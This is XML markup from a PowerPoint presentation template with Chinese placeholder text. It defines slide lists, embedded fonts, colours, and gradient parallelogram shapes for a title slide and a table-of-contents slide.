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40" r:id="rId2"/>
    <p:sldId id="324" r:id="rId3"/>
    <p:sldId id="325" r:id="rId4"/>
    <p:sldId id="345" r:id="rId5"/>
    <p:sldId id="346" r:id="rId6"/>
    <p:sldId id="348" r:id="rId7"/>
    <p:sldId id="344" r:id="rId8"/>
    <p:sldId id="347" r:id="rId9"/>
    <p:sldId id="351" r:id="rId10"/>
    <p:sldId id="349" r:id="rId11"/>
    <p:sldId id="350" r:id="rId12"/>
    <p:sldId id="352" r:id="rId13"/>
    <p:sldId id="353" r:id="rId14"/>
    <p:sldId id="335" r:id="rId15"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="OPPOSans H" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="OPPOSans L" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId19"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="优设标题黑" panose="02010600030101010101" charset="-122"/>
      <p:regular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华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
  </p:embeddedFontLst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9C46C5B-D476-4929-A58C-25CDB5D41020}">
          <p14:sldIdLst>
            <p14:sldId id="340"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="348"/>
            <p14:sldId id="344"/>
            <p14:sldId id="347"/>
            <p14:sldId id="351"/>
            <p14:sldId id="349"/>
            <p14:sldId id="350"/>
            <p14:sldId id="352"/>
            <p14:sldId id="353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pos="325">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7355" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="334">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="39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805E"/>
    <a:srgbClr val="799D86"/>
    <a:srgbClr val="49BCDD"/>
    <a:srgbClr val="0ED0A9"/>
    <a:srgbClr val="14CA95"/>
    <a:srgbClr val="19C57A"/>
    <a:srgbClr val="FDF731"/>
    <a:srgbClr val="1F8DA9"/>
    <a:srgbClr val="26ACCE"/>
    <a:srgbClr val="114D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6115" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="108" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="325"/>
        <p:guide pos="7355"/>
        <p:guide orient="horz" pos="334"/>
        <p:guide orient="horz" pos="39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notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="124" d="100"/>
          <a:sy n="124" d="100"/>
        </p:scale>
        <p:origin x="3003" y="65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 dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18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D4BB7-ADC9-E64E-AAAA-DB1E10F7C241}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>2025/3/19</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18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 dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="OPPOSans L" panose="00020600040101010101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D9CB6-B921-3743-B681-02986F8A8226}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="OPPOSans L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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7BB30C6B-F34A-4F02-BACE-D18C28E3B70A}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2025/3/19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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{175DD2B1-1A58-4FDB-AD54-64407EF7A1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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
        <a:ea typeface="OPPOSans L" panose="00020600040101010101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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
        <a:ea typeface="OPPOSans L" panose="00020600040101010101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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
        <a:ea typeface="OPPOSans L" panose="00020600040101010101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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
        <a:ea typeface="OPPOSans L" panose="00020600040101010101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POSans L" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
        <a:ea typeface="OPPOSans L" panose="00020600040101010101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86A2DAA-F6BA-BE22-98EF-CCC2C41B03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787" y="701902"/>
            <a:ext cx="2744515" cy="169342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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03357DD-ACE1-5BC1-EEAD-D0D30354C3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26282" y="6476773"/>
            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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AE1A1364-8EE0-2C28-EF55-17F78214AA87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627630" y="2039620"/>
            <a:ext cx="7741285" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 47826"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="1"/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/>
            <a:endParaRPr lang="zh-CN" altLang="en-US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75854B1E-D945-4C34-9B99-DEDB3BFE63C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2500630" y="1897380"/>
            <a:ext cx="7741285" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 47826"/>
            </a:avLst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2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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C276EC5-CCA7-9998-3277-2F11A53FC55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5885815" y="1581150"/>
            <a:ext cx="871220" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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7CBBC0E-84E2-A64A-E16E-46666DAEA454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627630" y="3213100"/>
            <a:ext cx="2003425" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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1A77F4F-1A3D-1A5F-9191-B1DAE6708E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8074025" y="3656330"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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74005B9-4287-5756-05BF-4A5E4F90D306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5762625" y="3316605"/>
            <a:ext cx="1067435" cy="1761490"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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4D32693-D7E6-6C57-FB17-408478DDB007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8776936" y="3154685"/>
            <a:ext cx="433070" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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7EB37DF-7C30-B4C4-2573-6B60D4A8B88A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3710940" y="3860165"/>
            <a:ext cx="433070" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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93A687AE-845F-65E2-2AE2-D1803BF357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99628" y="2302100"/>
            <a:ext cx="4675641" cy="32679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 marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:def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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入标题描述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72A45E43-DE86-72B8-C381-1661C526F9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60684" y="4179888"/>
            <a:ext cx="5965598" cy="1961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 algn="dist">
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text the description of the title in in English </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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05ADEE37-97FB-2B15-CE80-E92F021FD4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6200" y="2827499"/>
            <a:ext cx="4969328" cy="105774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 marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="96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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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C322DEA6-C3B6-AF73-871C-EF743B9C4F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586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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 marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83326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C9EDACB-B4DD-933F-81D1-B6EF8A1E289D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926965" y="2304415"/>
            <a:ext cx="2338705" cy="43053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dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>CONTENT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A86439-82FC-DAE6-2A78-06C58ECA3038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323205" y="1574800"/>
            <a:ext cx="1546225" cy="92329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zh-CN" altLang="en-US" sz="6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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>目录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965F3BB-F9E5-0234-B139-EFC269917B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957060" y="2036445"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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C542985-B371-F3C2-4C19-55185DB0E1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4155440" y="2036445"/>
            <a:ext cx="1080135" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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08184D90-52EA-1001-15FC-3FC4DB67DC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="3202305"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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altLang="zh-CN" sz="1200" i="1">
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D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72B24D-6111-5B0B-F20C-581AFFCC37EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261870" y="3223260"/>
            <a:ext cx="581025" cy="492125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sz="2400" i="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101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4E8B39A5-3402-B1FB-9784-FD943758D0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866900" y="4159885"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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 altLang="zh-CN" sz="1200" i="1">
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF476F6-AFB8-D81A-03AB-A41BB23831F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995170" y="4180840"/>
            <a:ext cx="581025" cy="492125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i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03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7D5112AC-5604-05F2-FA55-9185179EF2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946900" y="3202305"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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 altLang="zh-CN" sz="1200" i="1">
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8949745-D566-290A-C8A4-F6075F8BBB49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7075170" y="3223260"/>
            <a:ext cx="581025" cy="492125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i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r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923CDDC-21D6-35B5-D7F0-B9F040B39666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6680200" y="4159885"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="14280000" scaled="0"/>
          </a:gra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 altLang="zh-CN" sz="1200" i="1">
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{198BFEF3-AE72-2093-C1CB-CBA9C00CA03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6808470" y="4180840"/>
            <a:ext cx="581025" cy="492125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zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:defRPr sz="2400" i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03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52CEC246-F4E6-A765-10D2-905AD61C00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99435" y="3263851"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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5FD1AA99-05F5-18F4-B0F2-0115BD72E5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2735" y="4221431"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入标题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156BE333-6CF0-B3CC-99C0-1FC969FB7F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72821" y="3263851"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
